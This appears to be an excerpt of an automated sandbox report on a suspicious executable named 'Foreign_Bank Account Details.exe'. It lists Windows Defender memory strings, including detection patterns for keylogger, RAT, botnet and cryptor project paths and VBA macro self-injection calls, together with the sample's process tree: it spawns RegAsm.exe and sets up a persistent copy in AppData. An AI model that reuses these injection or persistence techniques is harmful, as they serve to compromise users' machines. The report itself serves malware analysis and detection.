Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: \WINDOWS.VBP]
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: .+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: DC:\Base de donnee\test\Projet1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: stub.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: Desktop\Russia\Error.vbp
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: AC:\puxa\lenda.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: .vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\VAIO\\Desktop\\2012\\Codec\\Graphics.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: B=:\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: J\MWP\Processed\Start.B.1\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: MH.+:\\Documents and Settings\\User\\Desktop\\.*pia de.*fab\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: GBD:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: cMicroLab.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: C>:\\.+\\Bkoli Hazm\\Lostdoor.+\\Client.+\\Helminth_Project.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: TroyanExplore\Instalar.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: VQ.+:\\Documents and Settings\\PC-[0-9]{1,3}\\Desktop\\loader fileVB\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\backup 20##11\\bank\\Pharming\\Projeto VB\\Project1.NET\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: B*\AF:\learn\visual basic\edu\hack\key logger\EgySpy v1.11\server\EgySpy.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: .+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: \gugu.vbp]
Source: MpSigStub.exe, 00000023.00000003.18329672768.0000015B1ADDA000.00000004.00000001.sdmp Binary or memory string: nh AV\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: removeTable.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString listboxStorageCounter
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: % .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp Binary or memory string: HKnamemom.vbpa
Source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: >\YPKISS~1\ULTIMA~1\ULTIMA~1.VBP
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: :Black Dream\Server\Server.vbp]
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: <7.+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: d_C:\\Documents and Settings\\Administrador\\Mis documentos\\Trabajo Empresarial de Luis\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: *\AG:\AM\Fonte\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: 8\MicroProCon\FileConfig.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: |C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbp
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\Virus Maker\\s1\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: KFC:\\Documents and Settings\\VAIO\\Desktop\\2012\\[a-zA-Z]+\\GbpSv.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\.+\\www.microfost.com -3.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: ,'.+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Foreign_Bank Account Details.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe'
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe 'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.256.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe /q WD
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.256.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-c45e5da5.exe /q WD Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-f54ed867.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle, 42_2_00007FF650D4F118
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; DELETE FROM RollingQueuesTables WHERE (Name NOT IN (SELECT DISTINCT EntryTable FROM RollingQueuesValues)); SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?; SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?; SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?; INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); DELETE FROM RollingQueuesValues WHERE ExpireTime < ?; DELETE FROM RollingQueuesTables; DELETE FROM RollingQueuesValues; SELECT COUNT(1) FROM RollingQueuesValues; Failed to fetch row from prepared statement.Failed to get column from prepared statement.Failed to bind value to prepared statement.
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO AutoFeatureControl(Key, CurrCount, MaxCount, InstanceTimeStamp) VALUES (?, ?, ?, ?);DELETE FROM AutoFeatureControl;DELETE FROM AutoFeatureControl WHERE InstanceTimeStamp < ?; SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Key, CurrCount, MaxCount, InstanceTimeStamp FROM AutoFeatureControl WHERE Key = ?DELETE FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;SELECT Count(1) FROM BackupProcessInfo;SELECT ID FROM BackupProcessInfo WHERE Key = ?;INSERT INTO BackupProcessInfo(Key, FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?);DELETE FROM BackupProcessInfo WHERE Key = ?;DELETE FROM BackupProcessInfo WHERE InstanceTimeStamp < ?; ^;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;N
Source: MpSigStub.exe, 00000023.00000003.18260309272.0000015B0C57A000.00000004.00000001.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
